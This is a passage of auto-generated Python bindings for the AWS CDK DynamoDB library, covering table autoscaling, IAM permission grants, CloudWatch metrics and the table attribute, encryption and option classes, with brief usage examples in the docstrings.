"""Enable read capacity scaling for the given GSI.
:param index_name: -
:param max_capacity: Maximum capacity to scale to.
:param min_capacity: Minimum capacity to scale to.
return
:return: An object to configure additional AutoScaling settings for this attribute
"""
props = EnableScalingProps(max_capacity=max_capacity, min_capacity=min_capacity)
return jsii.invoke(
self, "autoScaleGlobalSecondaryIndexReadCapacity", [index_name, props]
)
@jsii.member(jsii_name="autoScaleGlobalSecondaryIndexWriteCapacity")
def auto_scale_global_secondary_index_write_capacity(
self, index_name: str, *, max_capacity: jsii.Number, min_capacity: jsii.Number
) -> "IScalableTableAttribute":
"""Enable write capacity scaling for the given GSI.
:param index_name: -
:param max_capacity: Maximum capacity to scale to.
:param min_capacity: Minimum capacity to scale to.
return
:return: An object to configure additional AutoScaling settings for this attribute
"""
props = EnableScalingProps(max_capacity=max_capacity, min_capacity=min_capacity)
return jsii.invoke(
self, "autoScaleGlobalSecondaryIndexWriteCapacity", [index_name, props]
)
@jsii.member(jsii_name="autoScaleReadCapacity")
def auto_scale_read_capacity(
self, *, max_capacity: jsii.Number, min_capacity: jsii.Number
) -> "IScalableTableAttribute":
"""Enable read capacity scaling for this table.
:param max_capacity: Maximum capacity to scale to.
:param min_capacity: Minimum capacity to scale to.
return
:return: An object to configure additional AutoScaling settings
"""
props = EnableScalingProps(max_capacity=max_capacity, min_capacity=min_capacity)
return jsii.invoke(self, "autoScaleReadCapacity", [props])
@jsii.member(jsii_name="autoScaleWriteCapacity")
def auto_scale_write_capacity(
self, *, max_capacity: jsii.Number, min_capacity: jsii.Number
) -> "IScalableTableAttribute":
"""Enable write capacity scaling for this table.
:param max_capacity: Maximum capacity to scale to.
:param min_capacity: Minimum capacity to scale to.
return
:return: An object to configure additional AutoScaling settings for this attribute
"""
props = EnableScalingProps(max_capacity=max_capacity, min_capacity=min_capacity)
return jsii.invoke(self, "autoScaleWriteCapacity", [props])
@jsii.member(jsii_name="grant")
def grant(
self, grantee: aws_cdk.aws_iam.IGrantable, *actions: str
) -> aws_cdk.aws_iam.Grant:
"""Adds an IAM policy statement associated with this table to an IAM principal's policy.
If ``encryptionKey`` is present, appropriate grants to the key need to be added
separately using the ``table.encryptionKey.grant*`` methods.
:param grantee: The principal (no-op if undefined).
:param actions: The set of actions to allow (e.g. "dynamodb:PutItem", "dynamodb:GetItem", ...).
"""
return jsii.invoke(self, "grant", [grantee, *actions])
@jsii.member(jsii_name="grantFullAccess")
def grant_full_access(
self, grantee: aws_cdk.aws_iam.IGrantable
) -> aws_cdk.aws_iam.Grant:
"""Permits all DynamoDB operations ("dynamodb:*") to an IAM principal.
Appropriate grants will also be added to the customer-managed KMS key
if one was configured.
:param grantee: The principal to grant access to.
"""
return jsii.invoke(self, "grantFullAccess", [grantee])
@jsii.member(jsii_name="grantReadData")
def grant_read_data(
self, grantee: aws_cdk.aws_iam.IGrantable
) -> aws_cdk.aws_iam.Grant:
"""Permits an IAM principal all data read operations from this table: BatchGetItem, GetRecords, GetShardIterator, Query, GetItem, Scan.
Appropriate grants will also be added to the customer-managed KMS key
if one was configured.
:param grantee: The principal to grant access to.
"""
return jsii.invoke(self, "grantReadData", [grantee])
@jsii.member(jsii_name="grantReadWriteData")
def grant_read_write_data(
self, grantee: aws_cdk.aws_iam.IGrantable
) -> aws_cdk.aws_iam.Grant:
"""Permits an IAM principal to all data read/write operations to this table.
BatchGetItem, GetRecords, GetShardIterator, Query, GetItem, Scan,
BatchWriteItem, PutItem, UpdateItem, DeleteItem
Appropriate grants will also be added to the customer-managed KMS key
if one was configured.
:param grantee: The principal to grant access to.
"""
return jsii.invoke(self, "grantReadWriteData", [grantee])
@jsii.member(jsii_name="grantStream")
def grant_stream(
self, grantee: aws_cdk.aws_iam.IGrantable, *actions: str
) -> aws_cdk.aws_iam.Grant:
"""Adds an IAM policy statement associated with this table's stream to an IAM principal's policy.
If ``encryptionKey`` is present, appropriate grants to the key need to be added
separately using the ``table.encryptionKey.grant*`` methods.
:param grantee: The principal (no-op if undefined).
:param actions: The set of actions to allow (e.g. "dynamodb:DescribeStream", "dynamodb:GetRecords", ...).
"""
return jsii.invoke(self, "grantStream", [grantee, *actions])
@jsii.member(jsii_name="grantStreamRead")
def grant_stream_read(
self, grantee: aws_cdk.aws_iam.IGrantable
) -> aws_cdk.aws_iam.Grant:
"""Permits an IAM principal all stream data read operations for this table's stream: DescribeStream, GetRecords, GetShardIterator, ListStreams.
Appropriate grants will also be added to the customer-managed KMS key
if one was configured.
:param grantee: The principal to grant access to.
"""
return jsii.invoke(self, "grantStreamRead", [grantee])
@jsii.member(jsii_name="grantTableListStreams")
def grant_table_list_streams(
self, grantee: aws_cdk.aws_iam.IGrantable
) -> aws_cdk.aws_iam.Grant:
"""Permits an IAM Principal to list streams attached to current dynamodb table.
:param grantee: The principal (no-op if undefined).
"""
return jsii.invoke(self, "grantTableListStreams", [grantee])
@jsii.member(jsii_name="grantWriteData")
def grant_write_data(
self, grantee: aws_cdk.aws_iam.IGrantable
) -> aws_cdk.aws_iam.Grant:
"""Permits an IAM principal all data write operations to this table: BatchWriteItem, PutItem, UpdateItem, DeleteItem.
Appropriate grants will also be added to the customer-managed KMS key
if one was configured.
:param grantee: The principal to grant access to.
"""
return jsii.invoke(self, "grantWriteData", [grantee])
@jsii.member(jsii_name="metric")
def metric(
self,
metric_name: str,
*,
account: typing.Optional[str] = None,
color: typing.Optional[str] = None,
dimensions: typing.Optional[typing.Mapping[str, typing.Any]] = None,
label: typing.Optional[str] = None,
period: typing.Optional[aws_cdk.core.Duration] = None,
region: typing.Optional[str] = None,
statistic: typing.Optional[str] = None,
unit: typing.Optional[aws_cdk.aws_cloudwatch.Unit] = None,
) -> aws_cdk.aws_cloudwatch.Metric:
"""Return the given named metric for this Table.
:param metric_name: -
:param account: Account which this metric comes from. Default: - Deployment account.
:param color: The hex color code, prefixed with '#' (e.g. '#00ff00'), to use when this metric is rendered on a graph. The ``Color`` class has a set of standard colors that can be used here. Default: - Automatic color
:param dimensions: Dimensions of the metric. Default: - No dimensions.
:param label: Label for this metric when added to a Graph in a Dashboard. Default: - No label
:param period: The period over which the specified statistic is applied. Default: Duration.minutes(5)
:param region: Region which this metric comes from. Default: - Deployment region.
:param statistic: What function to use for aggregating. Can be one of the following: - "Minimum" | "min" - "Maximum" | "max" - "Average" | "avg" - "Sum" | "sum" - "SampleCount" | "n" - "pNN.NN" Default: Average
:param unit: Unit used to filter the metric stream. Only refer to datums emitted to the metric stream with the given unit and ignore all others. Only useful when datums are being emitted to the same metric stream under different units. The default is to use all metric datums in the stream, regardless of unit, which is recommended in nearly all cases. CloudWatch does not honor this property for graphs. Default: - All metric datums in the given metric stream
"""
props = aws_cdk.aws_cloudwatch.MetricOptions(
account=account,
color=color,
dimensions=dimensions,
label=label,
period=period,
region=region,
statistic=statistic,
unit=unit,
)
return jsii.invoke(self, "metric", [metric_name, props])
@jsii.member(jsii_name="metricConditionalCheckFailedRequests")
def metric_conditional_check_failed_requests(
self,
*,
account: typing.Optional[str] = None,
color: typing.Optional[str] = None,
dimensions: typing.Optional[typing.Mapping[str, typing.Any]] = None,
label: typing.Optional[str] = None,
period: typing.Optional[aws_cdk.core.Duration] = None,
region: typing.Optional[str] = None,
statistic: typing.Optional[str] = None,
unit: typing.Optional[aws_cdk.aws_cloudwatch.Unit] = None,
) -> aws_cdk.aws_cloudwatch.Metric:
"""Metric for the conditional check failed requests this table.
:param account: Account which this metric comes from. Default: - Deployment account.
:param color: The hex color code, prefixed with '#' (e.g. '#00ff00'), to use when this metric is rendered on a graph. The ``Color`` class has a set of standard colors that can be used here. Default: - Automatic color
:param dimensions: Dimensions of the metric. Default: - No dimensions.
:param label: Label for this metric when added to a Graph in a Dashboard. Default: - No label
:param period: The period over which the specified statistic is applied. Default: Duration.minutes(5)
:param region: Region which this metric comes from. Default: - Deployment region.
:param statistic: What function to use for aggregating. Can be one of the following: - "Minimum" | "min" - "Maximum" | "max" - "Average" | "avg" - "Sum" | "sum" - "SampleCount" | "n" - "pNN.NN" Default: Average
:param unit: Unit used to filter the metric stream. Only refer to datums emitted to the metric stream with the given unit and ignore all others. Only useful when datums are being emitted to the same metric stream under different units. The default is to use all metric datums in the stream, regardless of unit, which is recommended in nearly all cases. CloudWatch does not honor this property for graphs. Default: - All metric datums in the given metric stream
default
:default: sum over a minute
"""
props = aws_cdk.aws_cloudwatch.MetricOptions(
account=account,
color=color,
dimensions=dimensions,
label=label,
period=period,
region=region,
statistic=statistic,
unit=unit,
)
return jsii.invoke(self, "metricConditionalCheckFailedRequests", [props])
@jsii.member(jsii_name="metricConsumedReadCapacityUnits")
def metric_consumed_read_capacity_units(
self,
*,
account: typing.Optional[str] = None,
color: typing.Optional[str] = None,
dimensions: typing.Optional[typing.Mapping[str, typing.Any]] = None,
label: typing.Optional[str] = None,
period: typing.Optional[aws_cdk.core.Duration] = None,
region: typing.Optional[str] = None,
statistic: typing.Optional[str] = None,
unit: typing.Optional[aws_cdk.aws_cloudwatch.Unit] = None,
) -> aws_cdk.aws_cloudwatch.Metric:
"""Metric for the consumed read capacity units this table.
:param account: Account which this metric comes from. Default: - Deployment account.
:param color: The hex color code, prefixed with '#' (e.g. '#00ff00'), to use when this metric is rendered on a graph. The ``Color`` class has a set of standard colors that can be used here. Default: - Automatic color
:param dimensions: Dimensions of the metric. Default: - No dimensions.
:param label: Label for this metric when added to a Graph in a Dashboard. Default: - No label
:param period: The period over which the specified statistic is applied. Default: Duration.minutes(5)
:param region: Region which this metric comes from. Default: - Deployment region.
:param statistic: What function to use for aggregating. Can be one of the following: - "Minimum" | "min" - "Maximum" | "max" - "Average" | "avg" - "Sum" | "sum" - "SampleCount" | "n" - "pNN.NN" Default: Average
:param unit: Unit used to filter the metric stream. Only refer to datums emitted to the metric stream with the given unit and ignore all others. Only useful when datums are being emitted to the same metric stream under different units. The default is to use all metric datums in the stream, regardless of unit, which is recommended in nearly all cases. CloudWatch does not honor this property for graphs. Default: - All metric datums in the given metric stream
default
:default: sum over a minute
"""
props = aws_cdk.aws_cloudwatch.MetricOptions(
account=account,
color=color,
dimensions=dimensions,
label=label,
period=period,
region=region,
statistic=statistic,
unit=unit,
)
return jsii.invoke(self, "metricConsumedReadCapacityUnits", [props])
@jsii.member(jsii_name="metricConsumedWriteCapacityUnits")
def metric_consumed_write_capacity_units(
self,
*,
account: typing.Optional[str] = None,
color: typing.Optional[str] = None,
dimensions: typing.Optional[typing.Mapping[str, typing.Any]] = None,
label: typing.Optional[str] = None,
period: typing.Optional[aws_cdk.core.Duration] = None,
region: typing.Optional[str] = None,
statistic: typing.Optional[str] = None,
unit: typing.Optional[aws_cdk.aws_cloudwatch.Unit] = None,
) -> aws_cdk.aws_cloudwatch.Metric:
"""Metric for the consumed write capacity units this table.
:param account: Account which this metric comes from. Default: - Deployment account.
:param color: The hex color code, prefixed with '#' (e.g. '#00ff00'), to use when this metric is rendered on a graph. The ``Color`` class has a set of standard colors that can be used here. Default: - Automatic color
:param dimensions: Dimensions of the metric. Default: - No dimensions.
:param label: Label for this metric when added to a Graph in a Dashboard. Default: - No label
:param period: The period over which the specified statistic is applied. Default: Duration.minutes(5)
:param region: Region which this metric comes from. Default: - Deployment region.
:param statistic: What function to use for aggregating. Can be one of the following: - "Minimum" | "min" - "Maximum" | "max" - "Average" | "avg" - "Sum" | "sum" - "SampleCount" | "n" - "pNN.NN" Default: Average
:param unit: Unit used to filter the metric stream. Only refer to datums emitted to the metric stream with the given unit and ignore all others. Only useful when datums are being emitted to the same metric stream under different units. The default is to use all metric datums in the stream, regardless of unit, which is recommended in nearly all cases. CloudWatch does not honor this property for graphs. Default: - All metric datums in the given metric stream
default
:default: sum over a minute
"""
props = aws_cdk.aws_cloudwatch.MetricOptions(
account=account,
color=color,
dimensions=dimensions,
label=label,
period=period,
region=region,
statistic=statistic,
unit=unit,
)
return jsii.invoke(self, "metricConsumedWriteCapacityUnits", [props])
@jsii.member(jsii_name="metricSuccessfulRequestLatency")
def metric_successful_request_latency(
self,
*,
account: typing.Optional[str] = None,
color: typing.Optional[str] = None,
dimensions: typing.Optional[typing.Mapping[str, typing.Any]] = None,
label: typing.Optional[str] = None,
period: typing.Optional[aws_cdk.core.Duration] = None,
region: typing.Optional[str] = None,
statistic: typing.Optional[str] = None,
unit: typing.Optional[aws_cdk.aws_cloudwatch.Unit] = None,
) -> aws_cdk.aws_cloudwatch.Metric:
"""Metric for the successful request latency this table.
:param account: Account which this metric comes from. Default: - Deployment account.
:param color: The hex color code, prefixed with '#' (e.g. '#00ff00'), to use when this metric is rendered on a graph. The ``Color`` class has a set of standard colors that can be used here. Default: - Automatic color
:param dimensions: Dimensions of the metric. Default: - No dimensions.
:param label: Label for this metric when added to a Graph in a Dashboard. Default: - No label
:param period: The period over which the specified statistic is applied. Default: Duration.minutes(5)
:param region: Region which this metric comes from. Default: - Deployment region.
:param statistic: What function to use for aggregating. Can be one of the following: - "Minimum" | "min" - "Maximum" | "max" - "Average" | "avg" - "Sum" | "sum" - "SampleCount" | "n" - "pNN.NN" Default: Average
:param unit: Unit used to filter the metric stream. Only refer to datums emitted to the metric stream with the given unit and ignore all others. Only useful when datums are being emitted to the same metric stream under different units. The default is to use all metric datums in the stream, regardless of unit, which is recommended in nearly all cases. CloudWatch does not honor this property for graphs. Default: - All metric datums in the given metric stream
default
:default: avg over a minute
"""
props = aws_cdk.aws_cloudwatch.MetricOptions(
account=account,
color=color,
dimensions=dimensions,
label=label,
period=period,
region=region,
statistic=statistic,
unit=unit,
)
return jsii.invoke(self, "metricSuccessfulRequestLatency", [props])
@jsii.member(jsii_name="metricSystemErrors")
def metric_system_errors(
self,
*,
account: typing.Optional[str] = None,
color: typing.Optional[str] = None,
dimensions: typing.Optional[typing.Mapping[str, typing.Any]] = None,
label: typing.Optional[str] = None,
period: typing.Optional[aws_cdk.core.Duration] = None,
region: typing.Optional[str] = None,
statistic: typing.Optional[str] = None,
unit: typing.Optional[aws_cdk.aws_cloudwatch.Unit] = None,
) -> aws_cdk.aws_cloudwatch.Metric:
"""Metric for the system errors this table.
:param account: Account which this metric comes from. Default: - Deployment account.
:param color: The hex color code, prefixed with '#' (e.g. '#00ff00'), to use when this metric is rendered on a graph. The ``Color`` class has a set of standard colors that can be used here. Default: - Automatic color
:param dimensions: Dimensions of the metric. Default: - No dimensions.
:param label: Label for this metric when added to a Graph in a Dashboard. Default: - No label
:param period: The period over which the specified statistic is applied. Default: Duration.minutes(5)
:param region: Region which this metric comes from. Default: - Deployment region.
:param statistic: What function to use for aggregating. Can be one of the following: - "Minimum" | "min" - "Maximum" | "max" - "Average" | "avg" - "Sum" | "sum" - "SampleCount" | "n" - "pNN.NN" Default: Average
:param unit: Unit used to filter the metric stream. Only refer to datums emitted to the metric stream with the given unit and ignore all others. Only useful when datums are being emitted to the same metric stream under different units. The default is to use all metric datums in the stream, regardless of unit, which is recommended in nearly all cases. CloudWatch does not honor this property for graphs. Default: - All metric datums in the given metric stream
default
:default: sum over a minute
"""
props = aws_cdk.aws_cloudwatch.MetricOptions(
account=account,
color=color,
dimensions=dimensions,
label=label,
period=period,
region=region,
statistic=statistic,
unit=unit,
)
return jsii.invoke(self, "metricSystemErrors", [props])
@jsii.member(jsii_name="metricUserErrors")
def metric_user_errors(
self,
*,
account: typing.Optional[str] = None,
color: typing.Optional[str] = None,
dimensions: typing.Optional[typing.Mapping[str, typing.Any]] = None,
label: typing.Optional[str] = None,
period: typing.Optional[aws_cdk.core.Duration] = None,
region: typing.Optional[str] = None,
statistic: typing.Optional[str] = None,
unit: typing.Optional[aws_cdk.aws_cloudwatch.Unit] = None,
) -> aws_cdk.aws_cloudwatch.Metric:
"""Metric for the user errors this table.
:param account: Account which this metric comes from. Default: - Deployment account.
:param color: The hex color code, prefixed with '#' (e.g. '#00ff00'), to use when this metric is rendered on a graph. The ``Color`` class has a set of standard colors that can be used here. Default: - Automatic color
:param dimensions: Dimensions of the metric. Default: - No dimensions.
:param label: Label for this metric when added to a Graph in a Dashboard. Default: - No label
:param period: The period over which the specified statistic is applied. Default: Duration.minutes(5)
:param region: Region which this metric comes from. Default: - Deployment region.
:param statistic: What function to use for aggregating. Can be one of the following: - "Minimum" | "min" - "Maximum" | "max" - "Average" | "avg" - "Sum" | "sum" - "SampleCount" | "n" - "pNN.NN" Default: Average
:param unit: Unit used to filter the metric stream. Only refer to datums emitted to the metric stream with the given unit and ignore all others. Only useful when datums are being emitted to the same metric stream under different units. The default is to use all metric datums in the stream, regardless of unit, which is recommended in nearly all cases. CloudWatch does not honor this property for graphs. Default: - All metric datums in the given metric stream
default
:default: sum over a minute
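Example (illustrative sketch; ``dashboard`` is assumed to be an existing
``aws_cdk.aws_cloudwatch.Dashboard``)::

dashboard.add_widgets(aws_cdk.aws_cloudwatch.GraphWidget(
left=[table.metric_user_errors(statistic="sum")],
))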
"""
props = aws_cdk.aws_cloudwatch.MetricOptions(
account=account,
color=color,
dimensions=dimensions,
label=label,
period=period,
region=region,
statistic=statistic,
unit=unit,
)
return jsii.invoke(self, "metricUserErrors", [props])
@jsii.member(jsii_name="validate")
def _validate(self) -> typing.List[str]:
"""Validate the table construct.
return
:return: an array of validation error messages
"""
return jsii.invoke(self, "validate", [])
@builtins.property
@jsii.member(jsii_name="hasIndex")
def _has_index(self) -> bool:
"""Whether this table has indexes."""
return jsii.get(self, "hasIndex")
@builtins.property
@jsii.member(jsii_name="regionalArns")
def _regional_arns(self) -> typing.List[str]:
return jsii.get(self, "regionalArns")
@builtins.property
@jsii.member(jsii_name="tableArn")
def table_arn(self) -> str:
"""Arn of the dynamodb table.
attribute:
:attribute:: true
"""
return jsii.get(self, "tableArn")
@builtins.property
@jsii.member(jsii_name="tableName")
def table_name(self) -> str:
"""Table name of the dynamodb table.
attribute:
:attribute:: true
"""
return jsii.get(self, "tableName")
@builtins.property
@jsii.member(jsii_name="encryptionKey")
def encryption_key(self) -> typing.Optional[aws_cdk.aws_kms.IKey]:
"""KMS encryption key, if this table uses a customer-managed encryption key."""
return jsii.get(self, "encryptionKey")
@builtins.property
@jsii.member(jsii_name="tableStreamArn")
def table_stream_arn(self) -> typing.Optional[str]:
"""ARN of the table's stream, if there is one.
attribute:
:attribute:: true
"""
return jsii.get(self, "tableStreamArn")
@jsii.data_type(
jsii_type="@aws-cdk/aws-dynamodb.TableAttributes",
jsii_struct_bases=[],
name_mapping={
"encryption_key": "encryptionKey",
"global_indexes": "globalIndexes",
"local_indexes": "localIndexes",
"table_arn": "tableArn",
"table_name": "tableName",
"table_stream_arn": "tableStreamArn",
},
)
class TableAttributes:
def __init__(
self,
*,
encryption_key: typing.Optional[aws_cdk.aws_kms.IKey] = None,
global_indexes: typing.Optional[typing.List[str]] = None,
local_indexes: typing.Optional[typing.List[str]] = None,
table_arn: typing.Optional[str] = None,
table_name: typing.Optional[str] = None,
table_stream_arn: typing.Optional[str] = None,
) -> None:
"""Reference to a dynamodb table.
:param encryption_key: KMS encryption key, if this table uses a customer-managed encryption key. Default: - no key
:param global_indexes: The names of the global indexes set for this Table. Note that you need to set either this property, or {@link localIndexes}, if you want methods like grantReadData() to grant permissions for indexes as well as the table itself. Default: - no global indexes
:param local_indexes: The names of the local indexes set for this Table. Note that you need to set either this property, or {@link globalIndexes}, if you want methods like grantReadData() to grant permissions for indexes as well as the table itself. Default: - no local indexes
:param table_arn: The ARN of the dynamodb table. One of this, or {@link tableName}, is required. Default: - no table arn
:param table_name: The table name of the dynamodb table. One of this, or {@link tableArn}, is required. Default: - no table name
:param table_stream_arn: The ARN of the table's stream. Default: - no table stream
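Example (illustrative sketch; the ARN and index name are placeholders,
and the attributes are typically consumed through ``Table.from_table_attributes``)::

table = Table.from_table_attributes(self, "ImportedTable",
table_arn="arn:aws:dynamodb:us-east-1:123456789012:table/orders",
global_indexes=["byCustomer"],
)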
"""
self._values = {}
if encryption_key is not None:
self._values["encryption_key"] = encryption_key
if global_indexes is not None:
self._values["global_indexes"] = global_indexes
if local_indexes is not None:
self._values["local_indexes"] = local_indexes
if table_arn is not None:
self._values["table_arn"] = table_arn
if table_name is not None:
self._values["table_name"] = table_name
if table_stream_arn is not None:
self._values["table_stream_arn"] = table_stream_arn
@builtins.property
def encryption_key(self) -> typing.Optional[aws_cdk.aws_kms.IKey]:
"""KMS encryption key, if this table uses a customer-managed encryption key.
default
:default: - no key
"""
return self._values.get("encryption_key")
@builtins.property
def global_indexes(self) -> typing.Optional[typing.List[str]]:
"""The name of the global indexes set for this Table.
Note that you need to set either this property,
or {@link localIndexes},
if you want methods like grantReadData()
to grant permissions for indexes as well as the table itself.
default
:default: - no global indexes
"""
return self._values.get("global_indexes")
@builtins.property
def local_indexes(self) -> typing.Optional[typing.List[str]]:
"""The name of the local indexes set for this Table.
Note that you need to set either this property,
or {@link globalIndexes},
if you want methods like grantReadData()
to grant permissions for indexes as well as the table itself.
default
:default: - no local indexes
"""
return self._values.get("local_indexes")
@builtins.property
def table_arn(self) -> typing.Optional[str]:
"""The ARN of the dynamodb table.
One of this, or {@link tableName}, is required.
default
:default: - no table arn
"""
return self._values.get("table_arn")
@builtins.property
def table_name(self) -> typing.Optional[str]:
"""The table name of the dynamodb table.
One of this, or {@link tableArn}, is required.
default
:default: - no table name
"""
return self._values.get("table_name")
@builtins.property
def table_stream_arn(self) -> typing.Optional[str]:
"""The ARN of the table's stream.
default
:default: - no table stream
"""
return self._values.get("table_stream_arn")
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return "TableAttributes(%s)" % ", ".join(
k + "=" + repr(v) for k, v in self._values.items()
)
@jsii.enum(jsii_type="@aws-cdk/aws-dynamodb.TableEncryption")
class TableEncryption(enum.Enum):
"""What kind of server-side encryption to apply to this table."""
DEFAULT = "DEFAULT"
"""Server-side KMS encryption with a master key owned by AWS."""
CUSTOMER_MANAGED = "CUSTOMER_MANAGED"
"""Server-side KMS encryption with a customer master key managed by customer.
If ``encryptionKey`` is specified, this key will be used, otherwise, one will be defined.
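Example (illustrative sketch; assumes ``key`` is an existing
``aws_cdk.aws_kms.Key``)::

Table(self, "SecureTable",
partition_key=Attribute(name="pk", type=AttributeType.STRING),
encryption=TableEncryption.CUSTOMER_MANAGED,
encryption_key=key,
)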
"""
AWS_MANAGED = "AWS_MANAGED"
"""Server-side KMS encryption with a master key managed by AWS."""
@jsii.data_type(
jsii_type="@aws-cdk/aws-dynamodb.TableOptions",
jsii_struct_bases=[],
name_mapping={
"partition_key": "partitionKey",
"billing_mode": "billingMode",
"encryption": "encryption",
"encryption_key": "encryptionKey",
"point_in_time_recovery": "pointInTimeRecovery",
"read_capacity": "readCapacity",
"removal_policy": "removalPolicy",
"replication_regions": "replicationRegions",
"server_side_encryption": "serverSideEncryption",
"sort_key": "sortKey",
"stream": "stream",
"time_to_live_attribute": "timeToLiveAttribute",
"write_capacity": "writeCapacity",
},
)
class TableOptions:
def __init__(
self,
*,
partition_key: "Attribute",
billing_mode: typing.Optional["BillingMode"] = None,
encryption: typing.Optional["TableEncryption"] = None,
encryption_key: typing.Optional[aws_cdk.aws_kms.IKey] = None,
point_in_time_recovery: typing.Optional[bool] = None,
read_capacity: typing.Optional[jsii.Number] = None,
removal_policy: typing.Optional[aws_cdk.core.RemovalPolicy] = None,
replication_regions: typing.Optional[typing.List[str]] = None,
server_side_encryption: typing.Optional[bool] = None,
sort_key: typing.Optional["Attribute"] = None,
stream: typing.Optional["StreamViewType"] = None,
time_to_live_attribute: typing.Optional[str] = None,
write_capacity: typing.Optional[jsii.Number] = None,
) -> None:
"""Properties of a DynamoDB Table.
Use {@link TableProps} for all table properties.
:param partition_key: Partition key attribute definition.
:param billing_mode: Specify how you are charged for read and write throughput and how you manage capacity. Default: PROVISIONED if ``replicationRegions`` is not specified, PAY_PER_REQUEST otherwise
:param encryption: Whether server-side encryption with an AWS managed customer master key is enabled. This property cannot be set if ``serverSideEncryption`` is set. Default: - server-side encryption is enabled with an AWS owned customer master key
:param encryption_key: External KMS key to use for table encryption. This property can only be set if ``encryption`` is set to ``TableEncryption.CUSTOMER_MANAGED``. Default: - If ``encryption`` is set to ``TableEncryption.CUSTOMER_MANAGED`` and this property is undefined, a new KMS key will be created and associated with this table.
:param point_in_time_recovery: Whether point-in-time recovery is enabled. Default: - point-in-time recovery is disabled
:param read_capacity: The read capacity for the table. Careful if you add Global Secondary Indexes, as those will share the table's provisioned throughput. Can only be provided if billingMode is Provisioned. Default: 5
:param removal_policy: The removal policy to apply to the DynamoDB Table. Default: RemovalPolicy.RETAIN
:param replication_regions: Regions where replica tables will be created. Default: - no replica tables are created
:param server_side_encryption: Whether server-side encryption with an AWS managed customer master key is enabled. This property cannot be set if ``encryption`` and/or ``encryptionKey`` is set. Default: - server-side encryption is enabled with an AWS owned customer master key
:param sort_key: Table sort key attribute definition. Default: no sort key
:param stream: When an item in the table is modified, StreamViewType determines what information is written to the stream for this table. Default: - streams are disabled unless ``replicationRegions`` is specified
:param time_to_live_attribute: The name of the TTL attribute. Default: - TTL is disabled
:param write_capacity: The write capacity for the table. Careful if you add Global Secondary Indexes, as those will share the table's provisioned throughput. Can only be provided if billingMode is Provisioned. Default: 5
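Example (illustrative sketch of these options as consumed by the
``Table`` construct; attribute names are placeholders)::

Table(self, "Orders",
partition_key=Attribute(name="pk", type=AttributeType.STRING),
sort_key=Attribute(name="sk", type=AttributeType.STRING),
billing_mode=BillingMode.PAY_PER_REQUEST,
)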
"""
if isinstance(partition_key, dict):
partition_key = Attribute(**partition_key)
if isinstance(sort_key, dict):
sort_key = Attribute(**sort_key)
self._values = {
"partition_key": partition_key,
}
if billing_mode is not None:
self._values["billing_mode"] = billing_mode
if encryption is not None:
self._values["encryption"] = encryption
if encryption_key is not None:
self._values["encryption_key"] = encryption_key
if point_in_time_recovery is not None:
self._values["point_in_time_recovery"] = point_in_time_recovery
if read_capacity is not None:
self._values["read_capacity"] = read_capacity
if removal_policy is not None:
self._values["removal_policy"] = removal_policy
if replication_regions is not None:
self._values["replication_regions"] = replication_regions
if server_side_encryption is not None:
self._values["server_side_encryption"] = server_side_encryption
if sort_key is not None:
self._values["sort_key"] = sort_key
if stream is not None:
self._values["stream"] = stream
if time_to_live_attribute is not None:
self._values["time_to_live_attribute"] = time_to_live_attribute
if write_capacity is not None:
self._values["write_capacity"] = write_capacity
@builtins.property
def partition_key(self) -> "Attribute":
"""Partition key attribute definition."""
return self._values.get("partition_key")
@builtins.property
def billing_mode(self) -> typing.Optional["BillingMode"]:
"""Specify how you are charged for read and write throughput and how you manage capacity.
default
:default: PROVISIONED if ``replicationRegions`` is not specified, PAY_PER_REQUEST otherwise
"""
return self._values.get("billing_mode")
@builtins.property
def encryption(self) -> typing.Optional["TableEncryption"]:
"""Whether server-side encryption with an AWS managed customer master key is enabled.
This property cannot be set if ``serverSideEncryption`` is set.
default
:default: - server-side encryption is enabled with an AWS owned customer master key
"""
return self._values.get("encryption")
@builtins.property
def encryption_key(self) -> typing.Optional[aws_cdk.aws_kms.IKey]:
"""External KMS key to use for table encryption.
This property can only be set if ``encryption`` is set to ``TableEncryption.CUSTOMER_MANAGED``.
default
:default:
- If ``encryption`` is set to ``TableEncryption.CUSTOMER_MANAGED`` and this
property is undefined, a new KMS key will be created and associated with this table.
"""
return self._values.get("encryption_key")
@builtins.property
def point_in_time_recovery(self) -> typing.Optional[bool]:
"""Whether point-in-time recovery is enabled.
default
:default: - point-in-time recovery is disabled
"""
return self._values.get("point_in_time_recovery")
@builtins.property
def read_capacity(self) -> typing.Optional[jsii.Number]:
"""The read capacity for the table.
Careful if you add Global Secondary Indexes, as
those will share the table's provisioned throughput.
Can only be provided if billingMode is Provisioned.
default
:default: 5
"""
return self._values.get("read_capacity")
@builtins.property
def removal_policy(self) -> typing.Optional[aws_cdk.core.RemovalPolicy]:
"""The removal policy to apply to the DynamoDB Table.
default
:default: RemovalPolicy.RETAIN
"""
return self._values.get("removal_policy")
@builtins.property
def replication_regions(self) -> typing.Optional[typing.List[str]]:
"""Regions where replica tables will be created.
default
:default: - no replica tables are created
stability
:stability: experimental
"""
return self._values.get("replication_regions")
@builtins.property
def server_side_encryption(self) -> typing.Optional[bool]:
"""Whether server-side encryption with an AWS managed customer master key is enabled.
This property cannot be set if ``encryption`` and/or ``encryptionKey`` is set.
default
:default: - server-side encryption is enabled with an AWS owned customer master key
deprecated
:deprecated:
This property is deprecated. In order to obtain the same behavior as
enabling this, set the ``encryption`` property to ``TableEncryption.AWS_MANAGED`` instead.
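Example (illustrative sketch of the recommended replacement)::

Table(self, "T",
partition_key=Attribute(name="pk", type=AttributeType.STRING),
encryption=TableEncryption.AWS_MANAGED,  # instead of server_side_encryption=True
)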
stability
:stability: deprecated
"""
return self._values.get("server_side_encryption")
@builtins.property
def sort_key(self) -> typing.Optional["Attribute"]:
"""Table sort key attribute definition.
default
:default: no sort key
"""
return self._values.get("sort_key")
@builtins.property
def stream(self) -> typing.Optional["StreamViewType"]:
"""When an item in the table is modified, StreamViewType determines what information is written to the stream for this table.
default
:default: - streams are disabled unless ``replicationRegions`` is specified
"""
return self._values.get("stream")
@builtins.property
def time_to_live_attribute(self) -> typing.Optional[str]:
"""The name of TTL attribute.
default
:default: - TTL is disabled
"""
return self._values.get("time_to_live_attribute")
@builtins.property
def write_capacity(self) -> typing.Optional[jsii.Number]:
"""The write capacity for the table.
Careful if you add Global Secondary Indexes, as
those will share the table's provisioned throughput.
Can only be provided if billingMode is Provisioned.
default
:default: 5
"""
return self._values.get("write_capacity")
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
